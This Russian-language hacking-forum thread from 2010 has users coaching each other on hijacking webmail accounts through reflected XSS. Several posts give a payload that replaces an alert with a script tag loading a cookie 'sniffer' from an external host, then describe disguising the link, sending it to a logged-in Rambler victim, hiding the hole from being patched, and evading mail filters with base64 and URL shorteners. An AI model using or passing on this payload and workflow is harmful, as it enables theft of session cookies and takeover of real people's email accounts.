HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.07.2010, 01:00
vonkolot
Новичок
Регистрация: 06.06.2010
Сообщений: 1
С нами: 8386221

Репутация: 0
По умолчанию

есть xss...ты к ней добавляешь скрипт кражы куков..отправляшь жертве...куки приходят..ты их меняешь..и вуаля
 
Ответить с цитированием

  #2  
Старый 26.07.2010, 01:00
cerega1999
Познающий
Регистрация: 21.07.2010
Сообщений: 39
С нами: 8321366

Репутация: -7
По умолчанию

а какой скрипт послать что-бы жертва повелась?
 
Ответить с цитированием

  #3  
Старый 26.07.2010, 01:00
Logan4ik
Участник форума
Регистрация: 28.09.2014
Сообщений: 139
С нами: 6116831

Репутация: 0
По умолчанию

Цитата:

Сообщение от vonkolot

есть xss...ты к ней добавляешь скрипт кражы куков..отправляшь жертве...куки приходят..ты их меняешь..и вуаля

Значит есть xss

Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



заместо скрипа алерта вставляем скрипт кражи %3CSCRIPT type=text/javascript src=http://httpz.ru/wn05gmtt78go.js>" это с здешнешго онлайн снифера,так?

дальше маскировка и отправка жертве, которая должна быть авторизована и открывать она должна непосредственно с рамблера. Все верно?
 
Ответить с цитированием

  #4  
Старый 26.07.2010, 01:00
vonkolot
Новичок
Регистрация: 06.06.2010
Сообщений: 1
С нами: 8386221

Репутация: 0
По умолчанию

Цитата:

Сообщение от cerega1999

а какой скрипт послать что-бы жертва повелась?

Во первых не скрипт а xss а скрипт к xss дописывать..выше есть линк на тему про xss,там почитаешь,все поймешь!:hmcool:

Добавлено через 1 минуту

Цитата:

Сообщение от LogaN4ik

Значит есть xss
http://******************/?sum=56&years=6546&interest=">alert(/XSS/)

заместо скрипа алерта вставляем скрипт кражи %3CSCRIPT type=text/javascript src=http://httpz.ru/wn05gmtt78go.js>" это с здешнешго онлайн снифера,так?

http://********************/?sum=56&years=6546&interest="> после этого да? дальше маскировка и отправка жертве, которая должна быть авторизована и открывать она должна непосредственно с рамблера. Все верно?

во первых на саму xss быстренько хайд ставишь,а то прикроют!!! а вместо alert(/XSS/) пишешь %3CSCRIPT type=text/javascript src=http://httpz.ru/wn05gmtt78go.js>"
 
Ответить с цитированием

  #5  
Старый 26.07.2010, 01:00
Shade
Постоянный
Регистрация: 20.07.2009
Сообщений: 879
С нами: 8848406

Репутация: 133


По умолчанию

Цитата:

Сообщение от cerega1999

а какой скрипт послать что-бы жертва повелась?

Читай это >>> https://hpc.name/showthread.php?t=13808 тут всё очень подробно описано. Не пойму как это нельзя понимать!
 
Ответить с цитированием

  #6  
Старый 26.07.2010, 01:00
Logan4ik
Участник форума
Регистрация: 28.09.2014
Сообщений: 139
С нами: 6116831

Репутация: 0
По умолчанию

Цитата:

Сообщение от vonkolot

во первых на саму xss быстренько хайд ставишь,а то прикроют!!! а вместо alert(/XSS/) пишешь %3CSCRIPT type=text/javascript src=http://httpz.ru/wn05gmtt78go.js>"

Оке поставил. дальше все верно ?

Добавлено через 1 час 38 минут
Как сделать чтобы мэил не отвергал мое письмл с сылкой? я в бэйс 64 шифровал и делал миниссылку и третим способом..
 
Ответить с цитированием

  #7  
Старый 26.07.2010, 01:00
vonkolot
Новичок
Регистрация: 06.06.2010
Сообщений: 1
С нами: 8386221

Репутация: 0
По умолчанию

Цитата:

Сообщение от Vladimir1994

http://httpz.ru/wn05gmtt78go.js
вместо этого он должен поставить свой алиасс а не твой

Это не мой алиас,а ТС'а
 
Ответить с цитированием

  #8  
Старый 26.07.2010, 01:00
Logan4ik
Участник форума
Регистрация: 28.09.2014
Сообщений: 139
С нами: 6116831

Репутация: 0
По умолчанию

Сорри за название чтото потярялись буквы в слове МЫЛО

Прочитал уже кучу тем, и пересмотрел видосы но так и ненашел ответа+(
сперва пробывал просто ставить в строку скрипт, все нормально,
но при отправке жертве на мыло прямой ссылки на картинку со снифером, Почта ее не пропускает и возвращает мне обратно.

Попробывал шифровать ссылку сперва через тиниюрл и отправить, письмо отослалось снифер чтото разнюхал но квери нет..
При попытки кодировки ссылки на картинку в бейс 64 у меня открывается не картинка а текст названия картинки чтоли,забыл=), но куки не приходят..
а при способе 3 у меня вообще не изменяется ссылка..
все читал сдесь и смотрел виедео. https://hpc.name/showthread.php?t=13808
Попытался искать пассив на мэиле янде. рамбле. но так и не смог найти а база с ними мне не доступна.

ПОдскажите что я мож не так делаю, как мне быть то?
так
 
Ответить с цитированием

  #9  
Старый 26.07.2010, 01:00
Logan4ik
Участник форума
Регистрация: 28.09.2014
Сообщений: 139
С нами: 6116831

Репутация: 0
По умолчанию

Ну а допустим я нашел ХСС на мэиле какой алгоритм действий дальше?
 
Ответить с цитированием

  #10  
Старый 26.07.2010, 01:00
vonkolot
Новичок
Регистрация: 06.06.2010
Сообщений: 1
С нами: 8386221

Репутация: 0
По умолчанию

вот статья ОООЧЕНЬ все подробно описано https://hpc.name/showthread.php?t=13808 почитай сразу поймешь,а если не поймешь,там видео есть!
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.